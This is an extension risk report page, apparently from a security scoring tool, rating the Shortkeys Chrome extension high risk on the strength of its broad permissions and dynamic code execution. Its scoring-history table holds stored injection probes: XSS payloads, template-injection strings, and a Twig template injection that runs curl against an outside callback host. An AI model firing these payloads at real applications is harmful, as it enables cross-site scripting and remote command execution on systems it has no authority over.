Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

Shortkeys (Custom Keyboard Shortcuts)

logpjaacgmcbpdkdchjiaagddngobkck
Risk Score
7.44
Risk Level: High
Recommendation: 🚫 BLOCK
Category Productivity
Installs 100,000
Rating 3.4
Last updated 2026-03-18 (5 months ago)
Manifest version MV3
CSP present ✅ yes
Developer mikecrittenden@gmail.com
Verified publisher ❌ no
Featured by Google ✅ yes
Privacy policy link
Web Store open ↗

Top Risks

  • MANAGEMENT PERMISSION: extension can enumerate and disable other installed extensions (incl. security and privacy tools).
  • debugger + scripting + <all_urls> + userScripts = near-total browser control from a gmail-dev extension
  • new Function() executes arbitrary user-supplied code strings in background service worker
  • browsingData + management permissions allow destructive actions against browser state and other extensions
  • Privacy policy is Google's own generic account policy — does not scope to this extension at all (scored +10.0)

Evidence

  • HIGH permissions cluster manifest debugger, management, scripting, browsingData, userScripts all declared alongside <all_urls> host permission.
  • function_constructor in background.js crx new Function(userCode)() executed in background — arbitrary code execution from stored shortkey scripts.
  • Generic Google privacy policy store Privacy URL points to myaccount.google.com — not scoped to this extension; data_collection=true, third_party_sharing=true.
  • Free-webmail developer store Developer email mikecrittenden@gmail.com; no verified publisher badge; brand_mention.developer_domain=gmail.com.
  • install_url_hijack crx onInstalled opens https://shortkeys.app/welcome (+2.0 Webstore).
  • Geo-diverse JS hosts crx 5 countries (CA,DE,IN,SG,US) across 7 external hosts; geo_diversity +1.5 Network.
  • is_featured_by_google=true store Featured badge applied; reduces Reputation by -2.0 but does not negate high-capability concern.
  • rating 3.4 with no review red-flags store Below 4.5 threshold; no review_red_flags matched; no further penalty applied.

Permissions Breakdown

  • downloads medium Can trigger file downloads to user's system.
  • storage low Stores extension settings locally.
  • tabs medium Can read tab URLs and metadata across all tabs.
  • clipboardWrite medium Can write arbitrary content to clipboard.
  • browsingData high Can delete browsing history, cookies, cache — destructive high-risk API.
  • bookmarks medium Can read/write/delete user bookmarks.
  • sessions medium Can access recently closed tabs and session data.
  • management high Can disable/uninstall other extensions — significant lateral capability.
  • debugger high Attaches Chrome debugger protocol; full page inspection and script injection.
  • scripting high Injects scripts into pages; combined with <all_urls> is critical surface.
  • notifications low Can display desktop notifications.
  • activeTab low Scoped to user-activated tab; lower risk than broad host perms.
  • userScripts high Allows execution of arbitrary user-supplied scripts via API — very high risk.
  • *://*/* high Broad host permission covering all sites; amplifies every other HIGH permission.

Pillar Scores

Permissions9.50
Reputation6.50
Network4.50
Webstore4.00
Maintenance0.00
Privacy10.00
Code Quality5.00
CVE Exposure0.00

Scoring History

<fsssiedxa&#x27;sssiedx 7.04 High block 2026-08-16
<fsssiedxa"sssiedx 7.05 High block 2026-08-16
<fsssiedxa$"sssiedx 7.21 High block 2026-08-16
"fsssiedxa$"sssiedx 7.17 High block 2026-08-16
&#x27;fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx 7.09 High block 2026-08-16
&#x22;fsssiedxa&#x27;sssiedx 7.37 High block 2026-08-16
&#x22;fsssiedxa$'sssiedx 7.31 High block 2026-08-16
fsssiedxa$"sssiedx 7.27 High block 2026-08-16
'fsssiedxgfdsaxax><!--></ScRiPt>asddsssiedx 7.04 High block 2026-08-07
&#x27;fsssiedxg$"sssiedx 7.01 High block 2026-08-07
$"fsssiedxg sssiedx 7.19 High block 2026-08-07
<fsssiedxf$"sssiedx 7.27 High block 2026-08-07
<fsssiedxa'sssiedx 7.30 High block 2026-08-07
<fsssiedxi sssiedx 6.97 High block 2026-08-07
fsssiedx<sssiedx 7.24 High block 2026-08-07
xx pfsssiedxasssiedx 7.08 High block 2026-08-05
%22fsssiedxa xx psssiedx 7.41 High block 2026-08-05
'fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx 7.22 High block 2026-08-05
%27fsssiedxa$'sssiedx 7.17 High block 2026-08-05
7.14 High block 2026-08-05
&#x22;fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx 7.45 High block 2026-08-05
<fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx 7.32 High block 2026-08-05
fsssiedxa<sssiedx 7.14 High block 2026-08-05
dfb__${98991*97996}__::.x 7.11 High block 2026-08-05
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 7.02 High block 2026-08-05
v3.6&n916501=v989272 6.88 High block 2026-08-05
<fsssiedx{ sssiedx 6.64 High block 2026-07-29
<fsssiedx{$'sssiedx 7.01 High block 2026-07-29
<fsssiedxh xx psssiedx 7.14 High block 2026-07-29
<fsssiedxh$"sssiedx 7.07 High block 2026-07-29
fsssiedxh"sssiedx 7.21 High block 2026-07-29
sssieddrubricxsx 6.51 High block 2026-07-29
%76%33%2E%36%39%37%35%38%22%28%29%3B%7D%5D%39%33%33%32 7.07 High block 2026-07-29
v3.6"sTYLe='zzz:Expre/**/SSion(fksF(9514))'bad=" 7.20 High block 2026-07-29
v3.6"onmouseover=fksF(95972)" 7.05 High block 2026-07-29
<%={{={@{#{${dfb}}%> 7.13 High block 2026-07-29
bfg1640<s1﹥s2ʺs3ʹhjl1640 7.14 High block 2026-07-29
<th:t="${dfb}#foreach 7.41 High block 2026-07-29
bfgx1589%C0%BEz1%C0%BCz2a%90bcxhjl1589 7.27 High block 2026-07-29
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbwdydyznxk73781.bxss.me")}} 7.07 High block 2026-07-29
v3.6'"()&%<zzz><ScRiPt >fksF(9625)</ScRiPt> 7.31 High block 2026-07-29
v3.6 7.44 High block 2026-06-16

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:53
Listing SHA 050a0e728c69…
Force block — not fired
Score recovered no
Elapsed 27.6s